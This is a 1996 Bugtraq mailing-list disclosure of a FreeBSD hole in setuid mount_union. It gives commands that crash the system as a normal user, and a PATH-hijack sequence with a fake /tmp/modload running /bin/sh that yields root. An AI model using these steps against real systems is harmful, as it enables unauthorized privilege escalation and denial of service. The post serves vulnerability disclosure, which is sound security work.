[2559] in bugtraq
BoS: SECURITY BUG in FreeBSD
daemon@ATHENA.MIT.EDU (Krzysztof Labanowski)
Fri May 17 17:46:28 1996
Date: Fri, 17 May 1996 10:18:24 -0500
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Krzysztof Labanowski <CHRISL@gazeta.pl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
Hi!
FreeBSD has a security hole...
dangerous is mount_union if suid is set
vulnerable systems are: FreeBSD 2.1 RELEASE/2.2 CURRENT
probably FreeBSD 2.1 STABLE is not vulnerable
to crash system (as a normal user) try this:
mkdir a
mkdir b
mount_union ~/a ~/b
mount_union -b ~/a ~/b
to got euid try this:
export PATH=/tmp:$PATH #if zsh, of course
echo /bin/sh >/tmp/modload
chmod +x /tmp/modload
mount_union /dir1 /dir2
and You are root!
Hole found by Adam Kubicki
Best wishes
Chris Labanowski
KL
